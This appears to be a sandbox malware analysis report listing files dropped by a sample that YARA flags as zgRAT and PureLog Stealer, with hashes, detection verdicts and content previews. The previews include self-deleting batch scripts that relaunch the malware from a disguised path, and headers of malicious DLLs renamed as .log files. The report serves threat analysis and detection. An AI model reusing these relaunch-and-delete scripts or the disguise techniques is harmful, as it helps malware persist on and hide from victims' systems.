Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\PrintHood\WinStore.App.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\HY3kVmQ00V.bat"

C:\Users\user\AppData\Local\Temp\JtTnAS08Lp

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.323856189774724
Encrypted:	false
SSDEEP:	3:QSfDEtuQES:QSWj
MD5:	BC74A8A3C3DA06347943F32A9CBBF462
SHA1:	8F5AAA963663F395C45E507A520F324EE088B11F
SHA-256:	56D8DE27EBA28919D8267180C48D04FCAF013CA71DA9F684227CD0D65303D8E7
SHA-512:	7CBA2FC5661C6D1FC6CCA919911395097A021B819B90DC6B10719B2B009AFE214F8D29E437F054C0EC1DAED8728D5EE2F3EE213FFF1DEE6834C87A68009FC90D
Malicious:	false
Preview:	Ngr7MgS4xPaB3qmGkK5Wuahu4

C:\Users\user\AppData\Local\Temp\OTvWQnNRQU.bat

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	219
Entropy (8bit):	5.12722853964387
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE1r6KB8LDZKOZG1923fuZGn:HTg9uYDEN6KBUrmZGn
MD5:	D4AEC1CC18ABC6EF45E793CFEBEEC051
SHA1:	6385E1F88A72D4DB4BDF412075A3AFC70F8F5193
SHA-256:	74B4E0BCC16B60548FE758A04C22194CED734F94283927CCD757C55AE5D74863
SHA-512:	C69D8477A673EE41C82B7F97DBE642C1EF331CBA3E947558BB538F4E5258816B7213925D5504F7257AF5EC279E59B1C2860C4F516E5C68D5283080F61639DE17
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\PrintHood\WinStore.App.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\OTvWQnNRQU.bat"

C:\Users\user\AppData\Local\Temp\P0vGx4dh7G

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.323856189774724
Encrypted:	false
SSDEEP:	3:QjNdHWnctMK:S9MK
MD5:	159104C553CC1B1B51770FBF8B8F3ECB
SHA1:	F9415D3BE1DD0B2027C69005CEAF6A45CE1D0145
SHA-256:	C5EDD2816F199DA6D3ED5343109F0C5230033AEE912AB11B6C5E5EAC9C11EB35
SHA-512:	150D4A71D939FE1B0117FDF460E831194C1B8156B7C6DE2D2ECD3AE589DC490360E13871EDAB93244D7950CC2D60E7E69C82E706A3D0BC5880818B71B8E10C35
Malicious:	false
Preview:	MWmFedqpiENxphcufoB9HioKe

C:\Users\user\AppData\Local\Temp\P11EPT5Riu

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774722
Encrypted:	false
SSDEEP:	3:7cVtSnDl:YV6
MD5:	4C4B2FE53876DF97E7BB35BF501CC39F
SHA1:	36DE11BC323471FA0AFBE41989BD63BE02345406
SHA-256:	4406F2F0020F6A059817CA05FA05B946E2B3EF97554F863B09C9DB0D19DCD6F5
SHA-512:	007FB68E8A15F957613E7912C4025331355CAC9A80EC02C614CABF6C5846B0C50559762F5A1FD1CD346C5006C92346394F881BB763DDD43EEB4090730F2E5A7D
Malicious:	false
Preview:	3jnTdW1xM95zA8EM7t37USisP

C:\Users\user\AppData\Local\Temp\Q8sISb3ARb.bat

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	171
Entropy (8bit):	5.133254609177861
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1UdM6KBstnLk0diyBktKcKZG1Ukh4E2J5xAIBD3sH:hCRLuVFOOr+DE1r6KB8LDZKOZG1923fo
MD5:	A0B88F2A75F8541798D52FB1E5A5D313
SHA1:	9B8B30DDFDB910F32A4D0F4AD595AF834F787F90
SHA-256:	0A5963E846286542FA6BE6F8A9A1BE2FC95C3638F72CAA93E7C209464B0BD7AE
SHA-512:	8703B38935DE3DC7DDD8FA68FC0F60D56215E4F0E46D873A819F3F66EA1426368C842BF3E81FDBCAE0BA54D96EB442808C148D86B7D638443C35E55754386A50
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\PrintHood\WinStore.App.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Q8sISb3ARb.bat"

C:\Users\user\AppData\Local\Temp\QFV2wrsUQ5

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.323856189774723
Encrypted:	false
SSDEEP:	3:3xhD/OAGDn:BhNUn
MD5:	4A3A768300D0C68E3DAC77A825893697
SHA1:	326F7224F7C1D72C5E1249268222C47CABF75A72
SHA-256:	359DD59FCA6D494D0CA0CAF646603A330491CA9FE52DFF2A26FC27CFA58D54A5
SHA-512:	3B9293722D85A317DFACE42B81BC9CA19F454CAA70FA3700023C6192C1678D5A4A5401803BA35EEDE23C92E3FE51E919DF5F6144337601BB4010B900873DB342
Malicious:	false
Preview:	PuYTyUrl0df9EZOPistSzEswf

C:\Users\user\AppData\Local\Temp\eNWsovLG80

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.163856189774724
Encrypted:	false
SSDEEP:	3:dXUTtdCzk9:+/Z9
MD5:	4A5836F6CADDF9984683316FBDD20054
SHA1:	F1181E83FD194DAD7245C3BD72ACE69C25E54381
SHA-256:	C63CEFFE9F6AA0B2EE83FD9709895DD93DABA3A0361597F12F48FA8581A2E3E9
SHA-512:	EF936DDF22B6D26D8D171180ABD365D87F6803C2D61DF024850389B2C80B78D65735D35BC92627E4C328F092FE53891E146E93E77D927BF80197537C4D895BDA
Malicious:	false
Preview:	5VEh21O3DTNDco0bbY6VUg1Oc

C:\Users\user\AppData\Local\Temp\eaqIUzEKu5

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.083856189774723
Encrypted:	false
SSDEEP:	3:yFYSB1dfn:xS1n
MD5:	9F02273752076164072BA3610AC3CCE0
SHA1:	621E33AA430123A3F3E0CB4D53BCBA808538E747
SHA-256:	D0676B58474B43E483543B2DEEB9E13692C2B94BDE20A309C613078D7CBBADF8
SHA-512:	5AC5358244E37A7E35AFCE23E4311B4893275B90E65E869DA29715798963A15CB4B629730CEBDC4FF26902D1E00CFB0FF595D7256B88A46A27F837968F3F0B6F
Malicious:	false
Preview:	PYiCJjpf2pkBwdBhB5B3bJj1c

C:\Users\user\AppData\Local\Temp\ge8uHQboyx.bat

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	171
Entropy (8bit):	5.102116060336869
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1UdM6KBstnLk0diyBktKcKZG1Ukh4E2J5xAIYQpK:hCRLuVFOOr+DE1r6KB8LDZKOZG1923fO
MD5:	BDA5915FD2621CEFB9CD8BEB90617FDC
SHA1:	97A0ECA39B024C965142F7D7D9B188EC8993DCC4
SHA-256:	9F4C5C976A818336157CFE3014699D70852155FF31E91BA660E967B84CD7AFF7
SHA-512:	B29D0BE86891BCA9B6C4EB56F60EC49EB1544CD88E5B0BA5B33365D1C54FCE5DD2B567C401751EECAFDBBB3C342E74A7802890CDA819D62BA55196D7C78F2D77
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\PrintHood\WinStore.App.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ge8uHQboyx.bat"

C:\Users\user\AppData\Local\Temp\j1yuRIGRsn

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.373660689688184
Encrypted:	false
SSDEEP:	3:9W6T87pg:06Y9g
MD5:	BCC91FE80C5B502E2EB4187E4FE608A5
SHA1:	74F16310962BAC10116B4FFC4B28E52616212741
SHA-256:	0A513471D6FAAEA693FA22BA0642FA87760E9D12DA7F78B8653F8D9867F1539A
SHA-512:	863073849D5A59FE6489A13D97F3E2077CDEB923478290016BCC512B62802E1BF3D73E2C400DE80DDF5AB1E7F2094D30BA6D0A80303E5841F841CDFA564F6888
Malicious:	false
Preview:	ZWP9D39n642s9EISBgGHGoYC5

C:\Users\user\AppData\Local\Temp\jUIjg2wwh3

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:tOdA5hD:tPD
MD5:	B9D57654CAB7FEB34BB3D6F46A08765E
SHA1:	839D55E87CB24DE28F406B579EB8AB07D01D6A1F
SHA-256:	B10A042B27E791E78C98AEDAD83D6CE7FE7CB5B673301121CDE3C8035AAB3F1E
SHA-512:	93FA4F77BFA8CD0A8E4D601D1A809E8C30AD7758DFBD8C5D4E3965DDF38A5A612EEED887EBFF929581BA2942C5A4B8F3BDF0F45C46C8736F2E7609B4AF8849CB
Malicious:	false
Preview:	P9lWLK8fAk8eEmYgb6eavHhL4

C:\Users\user\AppData\Local\Temp\lRXC83nrKa.bat

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	171
Entropy (8bit):	5.098149877939076
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1UdM6KBstnLk0diyBktKcKZG1Ukh4E2J5xAITji:hCRLuVFOOr+DE1r6KB8LDZKOZG1923fy
MD5:	448881D32440BA9C78768A10C73D47E8
SHA1:	965C198B83E5C6FECB11880E7D5DB9E3FA5B5178
SHA-256:	1079AF7020AF2EF89B725183B8A20880F7B4109243DE20FD3226622FF45C8EFE
SHA-512:	2FA928473500655A0479B1D732EB940AF7EC25742D60C87DC5EE57A08C8FB6D7CB16AAFE84D82827F321BCB27A8E9D403E9814F792674D1ED9E6215961E32AF5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\PrintHood\WinStore.App.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\lRXC83nrKa.bat"

C:\Users\user\AppData\Local\Temp\rfQPUbaSjc.bat

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	171
Entropy (8bit):	5.068306381046756
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1UdM6KBstnLk0diyBktKcKZG1Ukh4E2J5xAIBxHjh:hCRLuVFOOr+DE1r6KB8LDZKOZG1923fF
MD5:	FE8D0E36D870124589F2E1F3F9D32960
SHA1:	71A6EF86BC70FB8BBEB217B75A34C98702F778FE
SHA-256:	F670B3800943D1CE5E313232B07BBCBC693A1D36AABE24AC99F58E9D963D46CF
SHA-512:	D0034BF62C5E8037B65B0963ACDE82707E5F030DBB5E72AC87EF16AFD404DFD321CF67A437D68211283DB838F080D1C089446A0FD530A41F04036222EA86ABEE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\PrintHood\WinStore.App.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\rfQPUbaSjc.bat"

C:\Users\user\AppData\Local\Temp\v5U0xVCEJ7

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.053660689688185
Encrypted:	false
SSDEEP:	3:D/SPwnn:D8wnn
MD5:	C286BBB6A5C20E5497588A40B138F050
SHA1:	316452B53E166FD3EB31AE3BFEF7AE0A1AB5A0AC
SHA-256:	AAFA9CB632A897D8387F0A2F7DE2D57EBE74F45F04843A0224518754A7632E45
SHA-512:	1B2D4D95293B68D687E2F4B8175E2964357A4151175C2EC1EAD682E5DA55DBD16D38F922023956B04AC840F5338EEAB67E80D4E7DA5621C94990005D6F85A03E
Malicious:	false
Preview:	sEVcStFbb9lJwxS9sjV9g4WWk

C:\Users\user\AppData\Local\Temp\wnvpFCGQjT

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:ComuJH2R:CoJH2R
MD5:	D2F293FCD5873DECC646802B4DE46D43
SHA1:	37354F6BC84B0246590452CAA42510A517A7E733
SHA-256:	72351116F7CFD614DF1DAF41343FA879C4E454672DF4D51882745874CFCC0661
SHA-512:	6E087D9AAE80454DF2EED64D63678720AB15A10A8320C6B6882FA7E7809EF871947B88882D561C5E31681C2A65FB192667019425A27C38C0B929F6223F7D7B43
Malicious:	false
Preview:	OJl0oPUMwfyRqfnTGhOWbSjJd

C:\Users\user\AppData\Local\Temp\wtO4vJVMF8.bat

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	219
Entropy (8bit):	5.153760186333638
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE1r6KB8LDZKOZG1923f7Cq:HTg9uYDEN6KBUrz7
MD5:	2B69760B16837CDFB226CEF37A15E4AF
SHA1:	671D5AF7FECEC49DDE5DE538B48B29F06CCB154A
SHA-256:	02172555D7EA35B24EF284A9CAFDB92F861040AF578CAA35AA86E45B5C2ACB7D
SHA-512:	33CF61A01A5C9606F5F210E26133EB66F2C60F57900D5F7EFD95302903CFC4C3B43F101586EED36DECF4D7709131CF9CE4210E73EA35E033948FCCC42E231C5A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\PrintHood\WinStore.App.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\wtO4vJVMF8.bat"

C:\Users\user\AppData\Local\Temp\zd3m5m79sA.bat

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	171
Entropy (8bit):	5.117144155948834
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1UdM6KBstnLk0diyBktKcKZG1Ukh4E2J5xAIrPQqq:hCRLuVFOOr+DE1r6KB8LDZKOZG1923f0
MD5:	B8DD4265691F1FA104E82E48D34C260C
SHA1:	C2D7DF01F2F0AD25D4A219A6D13BB5CD41D3B26A
SHA-256:	373EB436D1D06D6EF029861B600720E6A21AA038A74007CF6B14E59E0DBCC658
SHA-512:	E8A76ED35A9847D1A5542765D8D57E004D7D8B827437ACA034034FF571F477283AB001B829826EA1353E4BD55C6968B4F3C0CD1E9C882984AA989A962A56B3F9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\PrintHood\WinStore.App.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\zd3m5m79sA.bat"

C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1914880
Entropy (8bit):	7.537245081602837
Encrypted:	false
SSDEEP:	24576:Ns665jgyrw+2b5mhqAYimWuEHWLE0YEB9UMUBf1OXrsjAm9psqYLz2E2N:NGJ5YdB4WLvv9U3wX0AysqYL4
MD5:	67247063BFBF3EEDFDFD183E8235A5E8
SHA1:	B64EA61F13D24490DF89A9DCA8F42273A7F6C034
SHA-256:	1F95432AB7C23F582ACBB0E94D153813D030D74EA12ECEF3DF325EF5583A8015
SHA-512:	CC2B9C6A09103B6A4768FE8DF27DDD5569385CEC52B11835930D02DE42D6D5350D6FB0FCCF742B993D57CB4920E9B084C7DB295A3F95C76B6EC6805F13D8C3F0
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8dg.................0..........^N... ...`....@.. ....................................@..................................N..K....`.. ............................................................................ ............... ..H............text...d.... ...0.................. ..`.rsrc... ....`.......2..............@....reloc...............6..............@..B................@N......H.......D..............0...?o...M.......................................0..........(.... ........8........E...........N.......8....(.... ....~....{z...9....& ....8....(.... ....~....{....9....& ....8....(.... ....8........0.......... ........8........E................y...P...8....~....(O... .... .... ....s....~....(S....... ....~....{b...9....& ....8....~....:O... ....~....{....9y...& ....8n......... ....~....{....:T...& ....8I...r...ps....z*....~....(W...~....([... ....?.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\fd168b19609dff

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	ASCII text, with very long lines (518), with no line terminators
Category:	dropped
Size (bytes):	518
Entropy (8bit):	5.861483656085793
Encrypted:	false
SSDEEP:	12:/Df8dgZo8D1vngLcxnM0ibn3KgfDe6/w13No5:LfmgZ9D1vgynHO39zm9E
MD5:	8660E18BC0B5685C73CE4FB2EB48813A
SHA1:	CB06DABA32C039B78659BACD3A7EB1029998E6B2
SHA-256:	8331C9BA61A981119E22B2FB6CCE8C2688D5106A336A4EA353D704320A9D56E0
SHA-512:	2BD02809C9A4C9DDCA57CD26091328D261754B515A0051208968D2B1FCDC9265051233FEF202612ACF6F7C7A39FAADD62EDCFD9BD0DB6AE92702A7E5CD41BAE5
Malicious:	false
Preview:	S7DOjKCRmEdDAIajRZpVa8hcjfgCh9eH0HMofzkNBCYgjY2MdNVoCbEUakpEo9umjVN26wDcycTYkA2KmTjUozEZC1O5JgjBRv6NLAPqJ30kHquZrebUaa8tQxzFiISS3SHzEo8mE2Ku9eSWHyNoEOl0wM7YKKIAlhrzj5UCgzQhPNtwfd7t5nOoqQC1rkc3uKJcxcxMeKIO8DlicL3qMYF7TCIT2dV6WWwFDR8CqvPue9pnoeYgqvqVEMIvUdTAzM2lQfeLM1AbJUcUWfoYEyPlpbA1INrMbO5SHEWJ9NUzvPLutyYyz55B6Q5zenC9Jy95YKNSJeZ1eZ0aPQITy2WgS4V0IgoVKUq6PQVjlFpUgEghafkNfsKQbdmeyWKmzDqJt3K85jstNB9OXyZm5b0bJZfwo0uO5CecXXxhVmS6AbDZdYG97hrYNOATXYTEydxKgh0AB1RTI4brWFSQuuRXVGOIWeK7SNHgn226hF8FQXPTxS6RFDUEMazaSrngrUB4w5

C:\Users\user\Desktop\1cc5786b2a38db

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	ASCII text, with very long lines (756), with no line terminators
Category:	dropped
Size (bytes):	756
Entropy (8bit):	5.881156983578237
Encrypted:	false
SSDEEP:	12:P6b5z3vMaKmqPsgSFITWjsn0ZZM9lN7mZG0D/NPu0a8wGdwyizyCKzo3aPXOFEof:SJE8gSSTo77q4G0D/haO+yimC2DOFEof
MD5:	08A3ACBE3228D3007BA6BB6D5535A3A8
SHA1:	716CB1584FEE03F0C38CEA222FD1D1907F611DE6
SHA-256:	259FB77451D2B0871CB135A6CA5130D77E4F15406173EF940A4D586FDF6F6AA2
SHA-512:	B9082C11D35B79D653913B56A118158E4DBFE632833E7C709498515E52A64DCB14AC40EB4D619E5819F51B47BC2703DD42BA2BA8B560A699544993D9C2992354
Malicious:	false
Preview:	E516mHLJCQ0R31Sp5mquoif5ikUHnQkpc9rgoiaSdxpdzEAJnC2OnvFga5YCwEgvqLy4JwBXMYQ12BGdjLelXVBr3LGsJYfZQ3xnQF90AfCPeNnYz5ckk5XUKHA8pTNy21l8NdNeMnk2SwMphr2O54yUgcdIEAKrROXmmpLWs8Y6VfBX4Va8a937CQcu9EZLc2kEZjD1gff6g29AbFOtkMQSVZkVNaWojMec478URjc4d6aKRbT4zplQmSt99rnFJ1XUXgGdH4bAuVyY9ZEwHcy3lO0lN8Uk5WvmiGwuVzx5OkfQeUAkn18qCdtJqeQIj1FXkMz2mUbRp3pAskG28u7DYEjFXnE0joVWfIpSeI7SaqBIysbFXXKy4B8fmuf9QlsAhSej4yXzxonsCaQoM8cLehcdKKqum7Cy7BlfN1Lj9UBQXPcLd0xRIggA0BZtInN0lyuBzvaVx2MJfLG4reQwJvqbfkoMbbaVHKpifaVsaceQTWeo4fCnXaq0ITgPGN3Vb0CUghYRJhWrQaHIF9S6Zx8qeyZM4GmMjIycTJIXGuezE9jsLXJG566o2V0rHMWC5JIHloz6140oSImfPrAg7gQmLJk7TaQ3Yc441bGgiNOAGSVutVcaL0FZ3f5cE1nbo6Q0Nroxke7uRQf3xzO77zrhWfBVfocrjwWKCfgBrpzr2UHnACoPmpeyOsdsqSR5CQKe3V1STMQR9AoCXYUd9ME4Sh5TByVYY4pmKntpLW5ZYMyO

C:\Users\user\Desktop\BJKEmTPo.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Joe Sandbox View:	Filename: F3ePjP272h.exe, Detection: malicious, Browse Filename: cbCjTbodwa.exe, Detection: malicious, Browse Filename: vb8DOBZQ4X.exe, Detection: malicious, Browse Filename: 6G8OR42xrB.exe, Detection: malicious, Browse Filename: XNPOazHpXF.exe, Detection: malicious, Browse Filename: 3e88PGFfkf.exe, Detection: malicious, Browse Filename: 9FwQYJSj4N.exe, Detection: malicious, Browse Filename: 8k1e14tjcx.exe, Detection: malicious, Browse Filename: gkcQYEdJSO.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\DTgFmlup.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\DdlpkQmL.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\DhBojCdn.log

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
